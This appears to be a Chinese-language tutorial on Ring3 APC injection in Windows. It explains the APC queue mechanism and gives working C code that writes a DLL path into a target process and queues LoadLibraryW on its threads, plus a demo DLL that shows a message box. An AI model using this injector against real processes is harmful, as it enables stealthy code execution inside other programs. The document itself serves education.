注入系列：APC注入（Ring3）

APC注入的作用：APC注入可以让一个线程在它正常的执行路径运行之前执行一些其他的代码。

0x00：APC机制

要了解APC注入，我们首先来了解Windows的APC机制。

APC机制详细可参考本文：https://blog.csdn.net/qq229596421/article/details/77828647
简单来说，APC 是一个简称,具体名字叫做异步过程调用。是软件中断的一种。
APC队列：每个线程都有一个APC队列, 在线程处于可警告的等待状态(如下)时, 线程会执行APC队列中apc函数。

可警告的等待状态
只有当一个线程处于可警告的等待状态，用户模式APC 才可以交付给该线程。一个线程可以通过两种方式进入该状态：
1.等待一个对象句柄并指定它的状态是可警告的（使用WaitForMultipleObjectsEx 函数）
2.直接测试一下是否有未处理的APC（使用SleepEx）。
APC内核对象
APC是内核对象，与线程相关的，当内核接收到请求，要将一个APC 排队时，它将该APC 插入到将来执行此APC 例程的那个线程的队列中。然后，内核请求一个APC 级别的软件中断，当该线程最终开始执行的时候，就会执行此APC。

APC注入依靠APC队列来实现，具体实现原理如下：

0x01 实现原理：

每一个线程都有一个附加的APC队列，他们在线程处于可警告的时候才被处理（WaitForSingObjectEx,SleepEx）
如果程序在线程可警告等待状态时候排入一个APC队列，那么线程被唤醒时将开始执行APC函数，恶意代码则可以设置APC函数抢占可警告等待状态的线程。

0x02 具体实现流程：

1）当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时，系统就会产生一个软中断（或者是Messagebox弹窗的时候不点OK的时候也能注入）。
2）当线程再次被唤醒时，此线程会首先执行APC队列中的被注册的函数。
3）利用QueueUserAPC()这个API可以在软中断时向线程的APC队列插入一个回调函数，如果我们插入的是Loadlibrary()执行函数的话，就能达到注入DLL的目的。
注意：
APC使用有一定的局限性。需要一定的使用条件：
1.必须是多线程环境下
2.注入的程序必须会调用上面的那些同步对象.

0x03 实现代码*

injecter：

DWORD dwProcessId = GetPidFromName(wsProcessName);
	HANDLE hProcess   = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
	if (!hProcess)
	{
		return FALSE;
	}
	//申请内存空间，写入dll路径
	PVOID  lpData = VirtualAllocEx(hProcess,
		NULL,
		1024,
		MEM_COMMIT,
		PAGE_EXECUTE_READWRITE);
	DWORD dwRet;
	if (lpData) 
	{
		//在远程进程申请空间中写入待注入DLL的路径  
		WriteProcessMemory(hProcess,
			lpData,
			(LPVOID)wcCacheInDllPath,
			MAX_PATH, &dwRet);
	}
	CloseHandle(hProcess);
	//开始注入
	THREADENTRY32 te = { sizeof(THREADENTRY32) };
	//得到线程快照  
	HANDLE handleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
	if (INVALID_HANDLE_VALUE == handleSnap) 
	{
		return FALSE;
	}
	BOOL bStat = FALSE;
	//得到第一个线程  
	if (Thread32First(handleSnap, &te)) 
	{
		do {  //进行进程ID对比  
			if (te.th32OwnerProcessID == dwProcessId) 
			{
				//得到线程句柄  
				HANDLE handleThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);
				if (handleThread)
				{  //向线程插入APC  
					DWORD dwRet = QueueUserAPC(
						(PAPCFUNC)LoadLibraryW,
						handleThread,
						(ULONG_PTR)lpData);
					if (dwRet > 0) 
					{
						bStat = TRUE;
					}
					//关闭句柄  
					CloseHandle(handleThread);
				}
			}
			//循环下一个线程  
		} while (Thread32Next(handleSnap, &te));
	}
	CloseHandle(handleSnap);
	return bStat;

dll

`BOOL APIENTRY DllMain(HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		MessageBoxA(0, "注入成功", "恭喜", 0);
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
`

0x04 测试结果：